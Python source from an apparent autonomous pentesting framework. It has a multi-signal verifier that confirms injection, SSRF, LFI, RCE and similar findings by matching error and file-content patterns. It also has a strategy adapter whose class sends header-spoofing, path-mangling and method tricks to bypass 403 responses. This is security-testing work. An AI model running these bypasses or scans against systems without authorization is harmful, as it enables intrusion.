# ---------------------------------------------------------------------------
DB_ERROR_PATTERNS = [
r"(?:sql|database|query)\s*(?:error|syntax|exception)",
r"mysql_(?:fetch|query|num_rows|connect)",
r"mysqli_",
r"pg_(?:query|exec|prepare|connect)",
r"sqlite3?\.\w+error",
r"ora-\d{4,5}",
r"mssql_query",
r"sqlstate\[",
r"odbc\s+driver",
r"jdbc\s+exception",
r"unclosed\s+quotation",
r"you have an error in your sql",
r"syntax error.*at line \d+",
]
TEMPLATE_ERROR_PATTERNS = [
r"jinja2\.exceptions\.\w+",
r"mako\.exceptions\.\w+",
r"twig.*error",
r"freemarker.*error",
r"smarty.*error",
r"django\.template\.\w+",
r"template syntax error",
]
FILE_CONTENT_MARKERS = [
"root:x:0:0:",
"daemon:x:1:1:",
"bin:x:2:2:",
"www-data:",
"[boot loader]",
"[operating systems]",
"[extensions]",
]
SSTI_EVALUATIONS = {
"7*7": "49",
"7*'7'": "7777777",
"3*3": "9",
}
COMMAND_OUTPUT_MARKERS = [
r"uid=\d+\(",
r"gid=\d+\(",
r"root:\w+:0:0:",
r"/bin/(?:ba)?sh",
r"Linux\s+\S+\s+\d+\.\d+",
r"total\s+\d+\s*\n",
]
NOSQL_ERROR_PATTERNS = [
r"MongoError",
r"mongo.*(?:syntax|parse|query).*error",
r"\$(?:gt|lt|ne|in|nin|regex|where|exists)\b",
r"CastError.*ObjectId",
r"BSONTypeError",
r"operator.*\$(?:gt|lt|ne|regex)",
]
LDAP_ERROR_PATTERNS = [
r"javax\.naming\.(?:directory\.)?InvalidSearchFilterException",
r"Bad search filter",
r"ldap_search.*error",
r"invalid.*(?:dn|distinguished name|ldap filter)",
r"unbalanced.*parenthes[ei]s",
r"NamingException",
]
XPATH_ERROR_PATTERNS = [
r"XPathException",
r"Invalid XPath",
r"xmlXPathEval.*error",
r"DOMXPath.*(?:evaluate|query).*error",
r"SimpleXMLElement.*xpath",
r"unterminated.*(?:string|expression).*xpath",
r"XPATH syntax error",
]
GRAPHQL_ERROR_PATTERNS = [
r'"errors"\s*:\s*\[',
r"Syntax Error.*GraphQL",
r"Cannot query field",
r"Unknown argument",
r"Expected Name",
r"graphql.*parse.*error",
]
DESERIALIZATION_ERROR_PATTERNS = [
r"java\.io\.(?:InvalidClass|StreamCorrupted)Exception",
r"ClassNotFoundException",
r"unserialize\(\).*error",
r"pickle\.UnpicklingError",
r"yaml\.(?:scanner|parser)\.ScannerError",
r"__wakeup\(\).*failed",
r"ObjectInputStream",
r"readObject\(\).*exception",
]
EL_INJECTION_PATTERNS = [
r"javax\.el\.ELException",
r"org\.springframework\.expression\.spel",
r"EL Expression.*error",
r"OGNL.*exception",
]
# ---------------------------------------------------------------------------
# Health checking
# ---------------------------------------------------------------------------
UNHEALTHY_PATTERNS = [
"502 bad gateway",
"503 service unavailable",
"service unavailable",
"maintenance mode",
"under maintenance",
"temporarily unavailable",
"server is starting",
"connection refused",
]
class ResponseVerifier:
"""
Multi-signal verification framework for vulnerability confirmation.
4 independent signals are checked:
1. VulnEngine tester pattern match (structured analyze_response)
2. Baseline diff (status / length / hash change)
3. Payload effect (reflection, evaluation, file content)
4. New error patterns (present in test but absent in baseline)
Confidence rules:
- 2+ signals → confirmed (skip AI)
- 1 signal + confidence >= 0.8 → confirmed
- 1 signal + confidence < 0.8 → needs AI confirmation
- 0 signals → rejected
"""
def __init__(self):
self._compiled_db_errors = [re.compile(p, re.IGNORECASE) for p in DB_ERROR_PATTERNS]
self._compiled_template_errors = [re.compile(p, re.IGNORECASE) for p in TEMPLATE_ERROR_PATTERNS]
self._compiled_cmd_markers = [re.compile(p, re.IGNORECASE) for p in COMMAND_OUTPUT_MARKERS]
self._compiled_nosql_errors = [re.compile(p, re.IGNORECASE) for p in NOSQL_ERROR_PATTERNS]
self._compiled_ldap_errors = [re.compile(p, re.IGNORECASE) for p in LDAP_ERROR_PATTERNS]
self._compiled_xpath_errors = [re.compile(p, re.IGNORECASE) for p in XPATH_ERROR_PATTERNS]
self._compiled_graphql_errors = [re.compile(p, re.IGNORECASE) for p in GRAPHQL_ERROR_PATTERNS]
self._compiled_deser_errors = [re.compile(p, re.IGNORECASE) for p in DESERIALIZATION_ERROR_PATTERNS]
self._compiled_el_errors = [re.compile(p, re.IGNORECASE) for p in EL_INJECTION_PATTERNS]
# ------------------------------------------------------------------
# Target health check
# ------------------------------------------------------------------
async def check_target_health(self, session, url: str) -> Tuple[bool, dict]:
"""
Verify the target is alive and functional before testing.
Returns:
(is_healthy, info_dict)
"""
try:
async with session.get(url, timeout=15, allow_redirects=True) as resp:
body = await resp.text()
status = resp.status
headers = dict(resp.headers)
info = {
"status": status,
"content_length": len(body),
"content_type": headers.get("Content-Type", ""),
"server": headers.get("Server", ""),
}
# Reject server errors
if status >= 500:
info["reason"] = f"Server error (HTTP {status})"
return False, info
# Reject empty/minimal pages
if len(body) < 50:
info["reason"] = "Response too short (< 50 chars)"
return False, info
# Check for unhealthy content
body_lower = body.lower()
for pattern in UNHEALTHY_PATTERNS:
if pattern in body_lower:
info["reason"] = f"Unhealthy response: '{pattern}'"
return False, info
info["healthy"] = True
return True, info
except Exception as e:
return False, {"reason": f"Connection error: {str(e)[:200]}"}
# ------------------------------------------------------------------
# Baseline diffing
# ------------------------------------------------------------------
def compute_response_diff(self, baseline: dict, test_response: dict) -> dict:
"""
Compare test response against cached baseline.
Returns dict with diff metrics.
"""
baseline_body = baseline.get("body", "")
test_body = test_response.get("body", "")
baseline_len = len(baseline_body) if isinstance(baseline_body, str) else baseline.get("body_length", 0)
test_len = len(test_body)
length_diff = abs(test_len - baseline_len)
length_pct = (length_diff / max(baseline_len, 1)) * 100
baseline_hash = baseline.get("body_hash") or hashlib.md5(
baseline_body.encode("utf-8", errors="replace")
).hexdigest()
test_hash = hashlib.md5(
test_body.encode("utf-8", errors="replace")
).hexdigest()
# Detect new error patterns in test but not baseline
baseline_lower = (baseline_body if isinstance(baseline_body, str) else "").lower()
test_lower = test_body.lower()
new_errors = []
for pat in self._compiled_db_errors:
if pat.search(test_lower) and not pat.search(baseline_lower):
new_errors.append(pat.pattern)
for pat in self._compiled_template_errors:
if pat.search(test_lower) and not pat.search(baseline_lower):
new_errors.append(pat.pattern)
return {
"status_changed": baseline.get("status", 0) != test_response.get("status", 0),
"baseline_status": baseline.get("status", 0),
"test_status": test_response.get("status", 0),
"length_diff": length_diff,
"length_diff_pct": round(length_pct, 1),
"body_hash_changed": baseline_hash != test_hash,
"new_error_patterns": new_errors,
}
# ------------------------------------------------------------------
# Payload effect verification
# ------------------------------------------------------------------
def _check_payload_effect(self, vuln_type: str, payload: str,
test_body: str, test_status: int,
test_headers: dict,
baseline_body: str = "",
baseline_status: int = 0) -> Tuple[bool, Optional[str]]:
"""
Check if the payload produced a detectable effect in the response.
This is signal #3 in multi-signal verification.
Weak checks (NoSQL blind, parameter pollution, type juggling,
HTML injection, JWT, blind XSS, mutation XSS) require baseline
comparison to eliminate false positives.
"""
body_lower = test_body.lower()
baseline_lower = baseline_body.lower() if baseline_body else ""
# ---- XSS ----
if vuln_type in ("xss", "xss_reflected", "xss_stored", "xss_dom"):
payload_lower = payload.lower()
# Unescaped reflection — use context-aware analysis
if payload in test_body or payload_lower in body_lower:
from backend.core.xss_context_analyzer import analyze_xss_execution_context
ctx = analyze_xss_execution_context(test_body, payload)
if ctx["executable"]:
return True, f"XSS payload in auto-executing context: {ctx['detail']}"
if ctx["interactive"]:
return True, f"XSS payload in interactive context: {ctx['detail']}"
return False, None
# ---- SQLi ----
if vuln_type in ("sqli", "sqli_error", "sqli_union", "sqli_blind", "sqli_time"):
for pat in self._compiled_db_errors:
m = pat.search(body_lower)
if m:
return True, f"SQL error induced by payload: {m.group()}"
return False, None
# ---- SSTI ----
if vuln_type == "ssti":
for expr, result in SSTI_EVALUATIONS.items():
if expr in payload and result in test_body:
# Confirm the raw expression is NOT present (evaluated)
if expr not in test_body:
return True, f"Template expression evaluated: {expr}={result}"
return False, None
# ---- LFI / Path Traversal ----
if vuln_type in ("lfi", "path_traversal"):
for marker in FILE_CONTENT_MARKERS:
if marker.lower() in body_lower:
return True, f"File content detected: {marker}"
return False, None
# ---- Command Injection / RCE ----
if vuln_type in ("rce", "command_injection"):
for pat in self._compiled_cmd_markers:
m = pat.search(test_body)
if m:
return True, f"Command output detected: {m.group()}"
return False, None
# ---- SSRF ----
if vuln_type in ("ssrf", "ssrf_cloud"):
ssrf_markers = ["ami-id", "instance-type", "iam/info", "meta-data",
"computeMetadata", "root:x:0:0"]
for marker in ssrf_markers:
if marker.lower() in body_lower:
return True, f"Internal resource content: {marker}"
return False, None
# ---- Open Redirect ----
if vuln_type == "open_redirect":
if test_status in (301, 302, 303, 307, 308):
location = test_headers.get("Location", test_headers.get("location", ""))
if "evil.com" in location or location.startswith("//"):
return True, f"Redirect to external: {location}"
return False, None
# ---- XXE ----
if vuln_type == "xxe":
for marker in FILE_CONTENT_MARKERS:
if marker.lower() in body_lower:
return True, f"XXE file read: {marker}"
return False, None
# ---- NoSQL Injection ----
if vuln_type == "nosql_injection":
for pat in self._compiled_nosql_errors:
m = pat.search(body_lower)
if m:
return True, f"NoSQL error induced: {m.group()}"
# Boolean-based blind NoSQL: require response DIFFERS from baseline
if "$gt" in payload or "$ne" in payload or "$regex" in payload:
if baseline_body and test_status == 200:
len_diff = abs(len(test_body) - len(baseline_body))
len_pct = (len_diff / max(len(baseline_body), 1)) * 100
status_diff = test_status != baseline_status
if len_pct > 20 or status_diff:
return True, f"NoSQL blind: Response differs from baseline (delta {len_diff} chars, {len_pct:.0f}%)"
return False, None
# ---- LDAP Injection ----
if vuln_type == "ldap_injection":
for pat in self._compiled_ldap_errors:
m = pat.search(test_body)
if m:
return True, f"LDAP error induced: {m.group()}"
return False, None
# ---- XPath Injection ----
if vuln_type == "xpath_injection":
for pat in self._compiled_xpath_errors:
m = pat.search(test_body)
if m:
return True, f"XPath error induced: {m.group()}"
return False, None
# ---- CRLF Injection ----
if vuln_type == "crlf_injection":
# Check if injected header appears in response headers
injected_headers = ["X-Injected", "Set-Cookie", "X-CRLF-Test"]
for hdr in injected_headers:
if hdr.lower() in payload.lower():
header_val = test_headers.get(hdr, test_headers.get(hdr.lower(), ""))
if header_val and ("injected" in header_val.lower() or "crlf" in header_val.lower()):
return True, f"CRLF: Injected header appeared: {hdr}: {header_val[:100]}"
# Check for header splitting in body
if "\r\n" in payload and test_status in (200, 302):
if "x-injected" in body_lower or "set-cookie" in body_lower:
return True, "CRLF: Injected headers visible in response body"
return False, None
# ---- Header Injection ----
if vuln_type == "header_injection":
# Similar to CRLF but broader
if "\r\n" in payload or "%0d%0a" in payload.lower():
for hdr_name in ["X-Injected", "X-Custom"]:
if test_headers.get(hdr_name) or test_headers.get(hdr_name.lower()):
return True, f"Header injection: {hdr_name} injected via payload"
return False, None
# ---- Expression Language Injection ----
if vuln_type == "expression_language_injection":
for pat in self._compiled_el_errors:
m = pat.search(test_body)
if m:
return True, f"EL error induced: {m.group()}"
# Check for EL evaluation (similar to SSTI)
for expr, result in SSTI_EVALUATIONS.items():
if expr in payload and result in test_body and expr not in test_body:
return True, f"EL expression evaluated: {expr}={result}"
return False, None
# ---- Log Injection ----
if vuln_type == "log_injection":
# Check for injected log line content reflected back
log_markers = ["INJECTED_LOG_ENTRY", "FAKE_ADMIN_LOGIN", "log-injection-test"]
for marker in log_markers:
if marker in payload and marker in test_body:
return True, f"Log injection: Marker '{marker}' reflected in response"
return False, None
# ---- HTML Injection ----
if vuln_type == "html_injection":
payload_lower = payload.lower()
# Check for unescaped HTML tags reflected
html_tags = ["<h1", "<div", "<marquee", "<b>", "<u>", "<font", "<form"]
for tag in html_tags:
if tag in payload_lower and tag in body_lower:
# Verify not HTML-encoded
escaped = tag.replace("<", "&lt;")
if escaped not in body_lower:
# Require tag is NOT already present in baseline (pre-existing)
if baseline_lower and tag in baseline_lower:
continue # Tag exists in baseline — not injected
return True, f"HTML injection: Tag {tag} reflected unescaped (not in baseline)"
return False, None
# ---- CSV Injection ----
if vuln_type == "csv_injection":
csv_prefixes = ["=CMD", "=HYPERLINK", "+CMD", "-CMD", "@SUM"]
content_type = test_headers.get("Content-Type", test_headers.get("content-type", ""))
if "csv" in content_type.lower() or "spreadsheet" in content_type.lower():
for prefix in csv_prefixes:
if prefix in payload and prefix in test_body:
return True, f"CSV injection: Formula '{prefix}' in CSV output"
return False, None
# ---- GraphQL Injection ----
if vuln_type == "graphql_injection":
for pat in self._compiled_graphql_errors:
m = pat.search(test_body)
if m:
return True, f"GraphQL error: {m.group()}"
return False, None
# ---- ORM Injection ----
if vuln_type == "orm_injection":
orm_errors = [
r"hibernate.*exception", r"sequelize.*error", r"typeorm.*error",
r"ActiveRecord.*(?:Statement)?Invalid", r"django\.db.*error",
r"prisma.*error", r"sqlalchemy.*error",
]
for pat_str in orm_errors:
if re.search(pat_str, test_body, re.IGNORECASE):
return True, f"ORM error induced: {pat_str}"
return False, None
# ---- Blind XSS ----
if vuln_type == "blind_xss":
# Blind XSS payloads typically use external callbacks
# We can only detect if the payload was stored (reflected later)
if payload.lower() in body_lower:
if "src=" in payload.lower() or "onerror=" in payload.lower():
# Require payload NOT already in baseline
if baseline_lower and payload.lower() in baseline_lower:
return False, None
return True, "Blind XSS payload stored in response"
return False, None
# ---- Mutation XSS ----
if vuln_type == "mutation_xss":
# mXSS exploits browser HTML parsing mutations
mxss_markers = ["<svg", "<math", "<xmp", "<noembed", "<listing"]
for marker in mxss_markers:
if marker in payload.lower() and marker in body_lower:
# Require element NOT already in baseline
if baseline_lower and marker in baseline_lower:
continue
return True, f"Mutation XSS: Mutatable element {marker} reflected (not in baseline)"
return False, None
# ---- RFI ----
if vuln_type == "rfi":
rfi_indicators = ["<?php", "<%", "#!/", "import os"]
for indicator in rfi_indicators:
if indicator.lower() in body_lower:
return True, f"RFI: Remote file content marker: {indicator}"
return False, None
# ---- File Upload ----
if vuln_type == "file_upload":
upload_success = [
r"(?:file|upload).*(?:success|saved|stored|created)",
r"(?:uploaded|saved) to.*(?:\/|\\)",
]
for pat_str in upload_success:
if re.search(pat_str, body_lower):
return True, f"File upload succeeded: {pat_str}"
return False, None
# ---- Arbitrary File Read ----
if vuln_type == "arbitrary_file_read":
for marker in FILE_CONTENT_MARKERS:
if marker.lower() in body_lower:
return True, f"Arbitrary file read: {marker}"
return False, None
# ---- Arbitrary File Delete ----
if vuln_type == "arbitrary_file_delete":
delete_indicators = [
r"(?:file|resource).*(?:deleted|removed|not found after)",
r"successfully.*(?:deleted|removed)",
]
for pat_str in delete_indicators:
if re.search(pat_str, body_lower):
return True, f"File delete confirmed: {pat_str}"
return False, None
# ---- Zip Slip ----
if vuln_type == "zip_slip":
zip_indicators = [
r"extracted to.*/\.\./",
r"path traversal.*(?:zip|archive)",
]
for pat_str in zip_indicators:
if re.search(pat_str, body_lower):
return True, f"Zip slip: {pat_str}"
for marker in FILE_CONTENT_MARKERS:
if marker.lower() in body_lower:
return True, f"Zip slip - file overwrite evidence: {marker}"
return False, None
# ---- JWT Manipulation ----
if vuln_type == "jwt_manipulation":
# Tampered JWT accepted — require auth markers NOT in baseline
if test_status == 200 and ("alg" in payload.lower() or "none" in payload.lower()):
jwt_auth_markers = ["authorized", "welcome", "admin"]
for marker in jwt_auth_markers:
if marker in body_lower:
# If baseline also has this marker, it's normal behavior
if baseline_lower and marker in baseline_lower:
continue
return True, f"JWT manipulation: Tampered token granted access ({marker} not in baseline)"
return False, None
# ---- Prototype Pollution ----
if vuln_type == "prototype_pollution":
if "__proto__" in payload or "constructor" in payload:
pollution_markers = ["polluted", "__proto__", "isAdmin", "true"]
match_count = sum(1 for m in pollution_markers if m.lower() in body_lower)
if match_count >= 2:
return True, "Prototype pollution: Injected properties reflected"
return False, None
# ---- Host Header Injection ----
if vuln_type == "host_header_injection":
# Check if injected host is reflected in response
evil_hosts = ["evil.com", "attacker.com", "injected.host"]
for host in evil_hosts:
if host in payload and host in body_lower:
return True, f"Host header injection: {host} reflected in response"
# Password reset poisoning
if "evil.com" in payload:
if "reset" in body_lower or "password" in body_lower:
if "evil.com" in body_lower:
return True, "Host header injection: Evil host in password reset link"
return False, None
# ---- HTTP Smuggling ----
if vuln_type == "http_smuggling":
smuggling_indicators = [
test_status == 400 and "transfer-encoding" in payload.lower(),
"unrecognized transfer-coding" in body_lower,
"request smuggling" in body_lower,
]
if any(smuggling_indicators):
return True, "HTTP smuggling: Desync indicators detected"
return False, None
# ---- Cache Poisoning ----
if vuln_type == "cache_poisoning":
# Check if injected value appears in cached response
cache_headers = ["X-Cache", "CF-Cache-Status", "Age", "X-Cache-Hit"]
is_cached = any(
test_headers.get(h, test_headers.get(h.lower(), ""))
for h in cache_headers
)
if is_cached and payload.lower() in body_lower:
return True, "Cache poisoning: Payload reflected in cached response"
return False, None
# ---- Insecure Deserialization ----
if vuln_type == "insecure_deserialization":
for pat in self._compiled_deser_errors:
m = pat.search(test_body)
if m:
return True, f"Deserialization error: {m.group()}"
# Check for command execution via deser
for pat in self._compiled_cmd_markers:
m = pat.search(test_body)
if m:
return True, f"Deserialization RCE: {m.group()}"
return False, None
# ---- Parameter Pollution ----
if vuln_type == "parameter_pollution":
# HPP only confirmed if response DIFFERS significantly from baseline
if "&" in payload and baseline_body:
len_diff = abs(len(test_body) - len(baseline_body))
len_pct = (len_diff / max(len(baseline_body), 1)) * 100
status_diff = test_status != baseline_status
if len_pct > 20 or status_diff:
return True, f"Parameter pollution: Response differs from baseline (delta {len_diff} chars, {len_pct:.0f}%)"
return False, None
# ---- Type Juggling ----
if vuln_type == "type_juggling":
if test_status == 200:
if "0" in payload or "true" in payload.lower() or "[]" in payload:
auth_markers = ["authenticated", "authorized", "welcome", "admin", "success"]
for marker in auth_markers:
if marker in body_lower:
# Require marker NOT in baseline — otherwise it's normal behavior
if baseline_lower and marker in baseline_lower:
continue
return True, f"Type juggling: Auth bypass ({marker} appears only with juggled type)"
return False, None
# ---- SOAP Injection ----
if vuln_type == "soap_injection":
soap_errors = [
r"soap.*(?:fault|error|exception)",
r"xml.*(?:parse|syntax).*error",
r"<faultcode>",
r"<faultstring>",
]
for pat_str in soap_errors:
if re.search(pat_str, body_lower):
return True, f"SOAP injection: {pat_str}"
return False, None
# ---- Subdomain Takeover ----
if vuln_type == "subdomain_takeover":
takeover_markers = [
"there isn't a github pages site here",
"herokucdn.com/error-pages",
"the request could not be satisfied",
"no such app",
"project not found",
"this page is parked free",
"does not exist in the app platform",
"NoSuchBucket",
]
for marker in takeover_markers:
if marker.lower() in body_lower:
return True, f"Subdomain takeover: {marker}"
return False, None
return False, None
# ------------------------------------------------------------------
# Multi-signal verification (core method)
# ------------------------------------------------------------------
def multi_signal_verify(
self,
vuln_type: str,
payload: str,
test_response: dict,
baseline: Optional[dict],
tester_result: Tuple[bool, float, Optional[str]],
) -> Tuple[bool, str, int]:
"""
Combine 4 signals to determine if a vulnerability is confirmed.
Args:
vuln_type: Vulnerability type (registry key or legacy name)
payload: The payload used
test_response: The HTTP response from the payload test
baseline: Cached baseline response (can be None)
tester_result: (is_vuln, confidence, evidence) from VulnEngine tester
Returns:
(is_confirmed, evidence_summary, signal_count)
"""
signals: List[str] = []
evidence_parts: List[str] = []
max_confidence = 0.0
test_body = test_response.get("body", "")
test_status = test_response.get("status", 0)
test_headers = test_response.get("headers", {})
# --- Signal 1: VulnEngine tester pattern match ---
tester_vuln, tester_conf, tester_evidence = tester_result
if tester_vuln and tester_conf >= 0.7:
signals.append("tester_match")
evidence_parts.append(tester_evidence or "Pattern match")
max_confidence = max(max_confidence, tester_conf)
# --- Signal 2: Baseline diff ---
if baseline:
diff = self.compute_response_diff(baseline, test_response)
# Type-specific diff thresholds
significant_diff = False
if vuln_type in ("sqli", "sqli_error", "sqli_blind"):
significant_diff = diff["length_diff"] > 300 and diff["status_changed"]
elif vuln_type in ("lfi", "path_traversal", "xxe"):
significant_diff = diff["length_diff_pct"] > 50
elif vuln_type in ("ssti", "command_injection", "rce"):
significant_diff = diff["body_hash_changed"] and diff["length_diff"] > 100
else:
significant_diff = diff["status_changed"] and diff["length_diff"] > 500
if significant_diff:
signals.append("baseline_diff")
evidence_parts.append(
f"Response diff: status {diff['baseline_status']}->{diff['test_status']}, "
f"length delta {diff['length_diff']} ({diff['length_diff_pct']}%)"
)
# New error patterns is an independent sub-signal
if diff["new_error_patterns"]:
signals.append("new_errors")
evidence_parts.append(
f"New error patterns: {', '.join(diff['new_error_patterns'][:3])}"
)
# --- Signal 3: Payload effect ---
baseline_body = baseline.get("body", "") if baseline else ""
baseline_status = baseline.get("status", 0) if baseline else 0
effect_found, effect_evidence = self._check_payload_effect(
vuln_type, payload, test_body, test_status, test_headers,
baseline_body=baseline_body, baseline_status=baseline_status
)
if effect_found:
signals.append("payload_effect")
evidence_parts.append(effect_evidence)
# --- Confidence rules ---
signal_count = len(signals)
evidence_summary = " | ".join(evidence_parts) if evidence_parts else ""
if signal_count >= 2:
# 2+ signals → confirmed (skip AI)
return True, evidence_summary, signal_count
elif signal_count == 1 and max_confidence >= 0.8:
# 1 signal + high confidence → confirmed
return True, evidence_summary, signal_count
elif signal_count == 1:
# 1 signal + lower confidence → needs AI confirmation
# Return False but with evidence so caller can decide to ask AI
return False, evidence_summary, signal_count
else:
# 0 signals → rejected
return False, "", 0
+438
View File
@@ -0,0 +1,438 @@
"""
NeuroSploit v3 - Strategy Adapter
Mid-scan strategy adaptation: signal tracking, 403 bypass attempts,
diminishing returns detection, endpoint health monitoring, and
dynamic reprioritization for autonomous pentesting.
"""
import asyncio
import logging
import time
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Any, Callable
from urllib.parse import urlparse
logger = logging.getLogger(__name__)
@dataclass
class EndpointHealth:
"""Health tracking for a single endpoint."""
url: str
total_tests: int = 0
consecutive_failures: int = 0
status_403_count: int = 0
status_429_count: int = 0
timeout_count: int = 0
findings_count: int = 0
is_dead: bool = False
waf_detected: bool = False
avg_response_time: float = 0.0
_response_times: list = field(default_factory=list)
tested_types: set = field(default_factory=set)
last_test_time: float = 0.0
@dataclass
class VulnTypeStats:
"""Tracking stats per vulnerability type."""
vuln_type: str
total_tests: int = 0
confirmed_count: int = 0
rejected_count: int = 0
waf_block_count: int = 0
success_rate: float = 0.0
avg_confidence: float = 0.0
_confidences: list = field(default_factory=list)
class BypassTechniques:
"""403 Forbidden bypass with 15+ techniques."""
HEADER_BYPASSES = [
{"X-Original-URL": "{path}"},
{"X-Rewrite-URL": "{path}"},
{"X-Forwarded-For": "127.0.0.1"},
{"X-Forwarded-Host": "localhost"},
{"X-Custom-IP-Authorization": "127.0.0.1"},
{"X-Real-IP": "127.0.0.1"},
{"X-Originating-IP": "127.0.0.1"},
{"X-Remote-IP": "127.0.0.1"},
{"X-Client-IP": "127.0.0.1"},
{"X-Host": "localhost"},
]
PATH_BYPASSES = [
"{path}/.", # /admin/.
"{path}/./", # /admin/./
"{path}..;/", # /admin..;/
"/{path}//", # //admin//
"{path}%20", # /admin%20
"{path}%00", # /admin%00 (null byte)
"{path}?", # /admin?
"{path}???", # /admin???
"{path}#", # /admin#
"/%2e/{path_no_slash}", # /%2e/admin
"/{path_no_slash};/", # /admin;/
"/{path_no_slash}..;/", # /admin..;/
"/{path_upper}", # /ADMIN
]
METHOD_BYPASSES = ["OPTIONS", "PUT", "PATCH", "TRACE", "HEAD"]
@classmethod
async def attempt_bypass(
cls,
request_engine,
url: str,
original_method: str = "GET",
original_response: Optional[Dict] = None,
) -> Optional[Dict]:
"""Try bypass techniques on a 403'd URL.
Returns the first successful bypass response, or None.
"""
parsed = urlparse(url)
path = parsed.path
path_no_slash = path.lstrip("/")
path_upper = path.upper()
base_url = f"{parsed.scheme}://{parsed.netloc}"
# Phase 1: Header bypasses
for header_set in cls.HEADER_BYPASSES:
try:
headers = {}
for k, v in header_set.items():
headers[k] = v.format(path=path)
result = await request_engine.request(
url, method=original_method, headers=headers
)
if result and result.status not in (403, 401, 0):
logger.info(f"403 bypass via header {list(header_set.keys())[0]}: {url}")
return {
"status": result.status,
"body": result.body,
"headers": result.headers,
"bypass_method": f"header:{list(header_set.keys())[0]}",
}
except Exception:
continue
# Phase 2: Path bypasses
for path_tmpl in cls.PATH_BYPASSES:
try:
new_path = path_tmpl.format(
path=path, path_no_slash=path_no_slash, path_upper=path_upper
)
bypass_url = f"{base_url}{new_path}"
if parsed.query:
bypass_url += f"?{parsed.query}"
result = await request_engine.request(
bypass_url, method=original_method
)
if result and result.status not in (403, 401, 404, 0):
logger.info(f"403 bypass via path '{new_path}': {url}")
return {
"status": result.status,
"body": result.body,
"headers": result.headers,
"bypass_method": f"path:{new_path}",
}
except Exception:
continue
# Phase 3: Method bypasses
for method in cls.METHOD_BYPASSES:
if method == original_method:
continue
try:
result = await request_engine.request(url, method=method)
if result and result.status not in (403, 401, 405, 0):
logger.info(f"403 bypass via method {method}: {url}")
return {
"status": result.status,
"body": result.body,
"headers": result.headers,
"bypass_method": f"method:{method}",
}
except Exception:
continue
return None
class StrategyAdapter:
"""Mid-scan strategy adaptation engine.
Monitors endpoint health, vuln type success rates, and global signals
to dynamically adjust testing strategy.
Features:
- Dead endpoint detection (skip after N consecutive failures)
- Hot endpoint promotion (more testing on productive endpoints)
- 403 bypass (15+ techniques via BypassTechniques)
- Diminishing returns (stop testing unproductive type+endpoint combos)
- Dynamic rate limiting adjustment
- Priority recomputation every N tests
- Global statistics and reporting
"""
DEAD_ENDPOINT_THRESHOLD = 3 # Consecutive failures before marking dead
DIMINISHING_RETURNS_THRESHOLD = 10 # Max failed payloads before skipping type
ADAPTATION_INTERVAL = 50 # Tests between priority recomputations
MAX_403_BYPASS_PER_URL = 2 # Max bypass attempts per URL
HOT_ENDPOINT_THRESHOLD = 2 # Findings to mark endpoint as "hot"
def __init__(self, memory=None):
self.memory = memory
self._endpoints: Dict[str, EndpointHealth] = {}
self._vuln_stats: Dict[str, VulnTypeStats] = {}
self._global_test_count = 0
self._global_finding_count = 0
self._last_adaptation_time = time.time()
self._last_adaptation_count = 0
self._403_bypass_attempts: Dict[str, int] = {} # url -> attempt count
self._bypass_successes: List[Dict] = []
self._hot_endpoints: set = set()
self._rate_limit_detected = False
self._global_delay = 0.1
def _get_endpoint(self, url: str) -> EndpointHealth:
"""Get or create endpoint health tracker."""
# Normalize URL (strip query params for grouping)
parsed = urlparse(url)
key = f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
if key not in self._endpoints:
self._endpoints[key] = EndpointHealth(url=key)
return self._endpoints[key]
def _get_vuln_stats(self, vuln_type: str) -> VulnTypeStats:
"""Get or create vuln type stats tracker."""
if vuln_type not in self._vuln_stats:
self._vuln_stats[vuln_type] = VulnTypeStats(vuln_type=vuln_type)
return self._vuln_stats[vuln_type]
def record_test_result(
self,
url: str,
vuln_type: str,
status: int,
was_confirmed: bool,
confidence: int = 0,
duration: float = 0.0,
error_type: str = "success",
):
"""Record the result of a vulnerability test.
Called after each test attempt to update all tracking state.
"""
ep = self._get_endpoint(url)
vs = self._get_vuln_stats(vuln_type)
self._global_test_count += 1
# Update endpoint health
ep.total_tests += 1
ep.last_test_time = time.time()
ep.tested_types.add(vuln_type)
if duration > 0:
ep._response_times.append(duration)
if len(ep._response_times) > 30:
ep._response_times = ep._response_times[-20:]
ep.avg_response_time = sum(ep._response_times) / len(ep._response_times)
if status == 403:
ep.status_403_count += 1
elif status == 429:
ep.status_429_count += 1
self._rate_limit_detected = True
elif error_type in ("timeout", "connection_error"):
ep.timeout_count += 1
# Track consecutive failures
if was_confirmed:
ep.consecutive_failures = 0
ep.findings_count += 1
self._global_finding_count += 1
if ep.findings_count >= self.HOT_ENDPOINT_THRESHOLD:
self._hot_endpoints.add(ep.url)
elif status in (0, 403, 429) or error_type != "success":
ep.consecutive_failures += 1
if ep.consecutive_failures >= self.DEAD_ENDPOINT_THRESHOLD:
ep.is_dead = True
logger.debug(f"Endpoint marked dead: {ep.url}")
else:
# Got a response but no finding -- not a consecutive failure
ep.consecutive_failures = 0
# Update vuln type stats
vs.total_tests += 1
if was_confirmed:
vs.confirmed_count += 1
else:
vs.rejected_count += 1
if status == 403 and error_type == "waf_blocked":
vs.waf_block_count += 1
if confidence > 0:
vs._confidences.append(confidence)
if len(vs._confidences) > 50:
vs._confidences = vs._confidences[-30:]
vs.avg_confidence = sum(vs._confidences) / len(vs._confidences)
vs.success_rate = vs.confirmed_count / vs.total_tests if vs.total_tests > 0 else 0
def should_test_endpoint(self, url: str) -> bool:
"""Check if an endpoint should still be tested."""
ep = self._get_endpoint(url)
if ep.is_dead:
return False
return True
def should_test_type(self, vuln_type: str, url: str) -> bool:
"""Check if a vuln type should be tested on an endpoint."""
ep = self._get_endpoint(url)
vs = self._get_vuln_stats(vuln_type)
# Skip if endpoint is dead
if ep.is_dead:
return False
# Skip if this type has 0% success after 15+ global tests AND waf blocks
if vs.total_tests >= 15 and vs.success_rate == 0 and vs.waf_block_count > 5:
logger.debug(f"Skipping {vuln_type}: 0% success + WAF blocks")
return False
return True
def should_reduce_payloads(self, vuln_type: str, tested_count: int) -> bool:
"""Check if we should stop testing payloads (diminishing returns)."""
vs = self._get_vuln_stats(vuln_type)
# Allow more payloads for types with good success rate
if vs.success_rate > 0.1:
return tested_count >= self.DIMINISHING_RETURNS_THRESHOLD * 2
return tested_count >= self.DIMINISHING_RETURNS_THRESHOLD
def should_attempt_403_bypass(self, url: str) -> bool:
"""Check if we should try 403 bypass for this URL."""
ep = self._get_endpoint(url)
attempts = self._403_bypass_attempts.get(ep.url, 0)
return (
ep.status_403_count >= 2
and attempts < self.MAX_403_BYPASS_PER_URL
)
